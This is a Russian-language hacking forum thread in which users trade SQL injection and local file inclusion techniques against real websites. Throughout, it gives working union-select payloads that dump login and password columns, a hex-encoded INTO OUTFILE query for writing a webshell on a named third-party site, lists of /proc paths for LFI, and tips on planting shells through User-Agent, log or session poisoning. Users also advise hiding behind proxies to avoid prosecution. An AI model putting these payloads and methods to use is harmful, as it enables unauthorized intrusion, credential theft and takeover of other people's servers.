Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида: site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
Пробовал также. В общем видимо иньекция действительно в лимите.Я вроде где то тут читал,что можно обойти, если ткнёте, буду признателен.Не могу найти. Или глючит =)
Имхо тут два варианта: 1. Либо нет доступа к самой таблице. 2. Либо табла находится в другой базе. Чтоб узнать базу пишем asd.ru/yo.php?yo=-123+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name=0x757a7a65727373+--+ Ну и соответственно выбираем union+select+1,2,group_concat(concat_ws(0x3a,log,pass)),4+from+[table_schema].uzzerss+--+
Я чайник, по шаблону не получаеццо =(( в общем ситуация такая... делпю запрос получаю это вот tava:root@localhost:5.0.27 Кодирую tava в 16-тиричную систему, получаю это 0x74617661 Делаю запрос на таблицы этой бд и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+FROM+information_schema.tables+WHERE+ table_schema=0x74617661--
Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки.. Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12... Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40... Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121... Это с правами свфязано или запрос некорретный всетаки ?
Ок. Тот же сайт к сведению,просто там другая страница была.Кстати нормально всё работает,видимо он пробелы не удалил.
нашел: Где-то с 40 сайтов на которых присутствует уязвимость LFI: На большой части с них присутствуют: Code: /proc/self/environ /proc/self/status /proc/self/fd/2 /proc/self/fd/7 /proc/self/fd/10 /proc/version /proc/self/cmdline /proc/devices Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла. Что и не дало ни 1 жданного результата (true). Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл? Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет! Пока все!)
[censored] а вот как заливать шелл будеш? тут уже нужно эксперементировать... если присутствует /proc/self/environ пробуй с помощю user-agent'a подменить код на свой... либо через логи апача, либо через сессии-но тут есть одно но, нужно знать путь
омг, что за чушь?=\ 2 Alf0x0ns советую ознакомиться с http://forum.antichat.ru/showpost.php?p=1088072&postcount=11, думаю это частично решит твою проблему залития шеллов в данном случае то что ты привел выше, не директории. поиск и чтение конфигов вебсервера (к примеру /etc/httpd/conf/httd.conf) поиск пхпинфо на самом сайте и сайтах рядом
я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь: Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).
2 020963 Юзай прокси и не будет подобных проблем. это плохо, что понимаешь, но все равно пишешь тебя могут "креминально" наказать, т.ч. заготавливай крем.
- Конечно настучать могут и должны это делать в целях своей же безопасности) - Ну станут это ищо как сказать .. все зависит от руководства(владелеца) сервера. Больше шансов получить если сайт на котором тестиш уязвимости есть крупным проектом!
получем ошибку ну судя по всему это инклуд, хотя хз... пытаюсь приинклудить шелл, но ошибка остается... в чем проблема? и второй вопрос. Code: www.riskcenter.com имя и пароль из БД admin;admin админка /admin (но потом идет редирект на http://admin801.securesites.net/cgi-bin/manage.pl/index.html также имеется директория конфиг.пхп , но походу она пуста), пхпинфо тоже присутсвует... phpmyadmin в однименно диретории... реально ли тут применить "читалку" и попасть в пхпмай админ или каким либо другим образом, если да, то как?
http://adm in801.securesites.net/risk2.tar а это случаем не екап сайта? попробывал залить через двойной запрос.. http://admin801.securesites.net/story.php?id=-19469+union+select+0x2d3120756e696f6e2073656c65637420312c312c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392066726f6d206d7973716c2e7573657220696e746f206f757466696c6520272f746d702f7465737474322e70687027,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--+ Но что-то не хочет лить даже в /tmp, странно..Может что пропустил подуставший...Хотя обычный подзапрос типа union select 1,2,3..19 from mysql.user where name = 'root', работает на ура. Второй вариант, читаешь конфиг, заходишь в phpmyadmin и заливаешь шелл ) я уже Скажу по секрету, папка с правами там есть
Как понять комбинация не пашет? Ты подставил только это?Покажи полностью строчку которую ты подставляешь в уязвимый скрипт? Переформулируй пожалуйста вопрос, с более точной конкретикой описаний действий и что ты хочешь получить в результате. PS "В правильно поставленном вопросе, половина ответа на него" (с) Не помню кто ...